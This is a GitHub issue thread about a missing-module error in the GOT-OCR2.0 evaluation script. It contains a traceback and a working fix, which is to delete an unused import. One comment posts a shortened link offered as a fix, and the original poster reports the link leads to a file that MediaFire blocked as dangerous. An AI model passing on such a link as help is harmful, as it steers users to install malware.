### ISSUE TITLE
ModuleNotFoundError: No module named 'GOT.model.plug.transforms'

### ISSUE THREAD

**Issue by lrybbbccc** [Ucas-HaoranWei/GOT-OCR2.0#58]
Hello, an error occurs when I tried to run the eval script given in this repository:
`python GOT-OCR2.0/GOT-OCR-2.0-master/GOT/eval/evaluate_GOT.py --model-name models/ --gtfile_path benchmarks/format_doc_benchmark/format_eval.json --image_path benchmarks/format_doc_benchmark/ --out_path test-output/ --num-chunks 4 --datatype OCR`
which returns
`Traceback (most recent call last):
  File "..../anaconda3-4gpu-2/envs/got/lib/python3.10/runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "..../anaconda3-4gpu-2/envs/got/lib/python3.10/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "..../GOT/GOT-OCR2.0/GOT-OCR-2.0-master/GOT/eval/eval_GOT_ocr.py", line 34, in <module>
    from GOT.model.plug.transforms import train_transform, test_transform
ModuleNotFoundError: No module named 'GOT.model.plug.transforms'
Evaluating.....
Traceback (most recent call last):
  File "...../anaconda3-4gpu-2/envs/got/lib/python3.10/runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File ".../anaconda3-4gpu-2/envs/got/lib/python3.10/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File ".../GOT/GOT-OCR2.0/GOT-OCR-2.0-master/GOT/eval/pyevaltools/eval_ocr.py", line 220, in <module>
    doc_text_eval(args.gt_path, args.out_path + "/results_final.json", args.datatype)
  File ".../GOT/GOT-OCR2.0/GOT-OCR-2.0-master/GOT/eval/pyevaltools/eval_ocr.py", line 202, in doc_text_eval
    for k, v in result[0].items():
IndexError: list index out of range`

**Comment by aleroldan156** [comment]
I think this will help you.

https://bit.ly/4eugCty

you may need to install the c compiler

**Comment by lrybbbccc** [comment]
> I think this will help you.
> 
> https://bit.ly/4eugCty
> 
> you may need to install the c compiler

Thanks, but I click the link and the web page shows that:

Dangerous File Blocked
The file you attempted to download was determined to be dangerous. For your protection, MediaFire does not enable distribution of dangerous files.

**Comment by lrybbbccc** [comment]
It works by simply removing the line 34 in /GOT/eval/eval_GOT_ocr.py : 
`from GOT.model.plug.transforms import train_transform, test_transform`
since the train_transform, test_transform are not used in this code
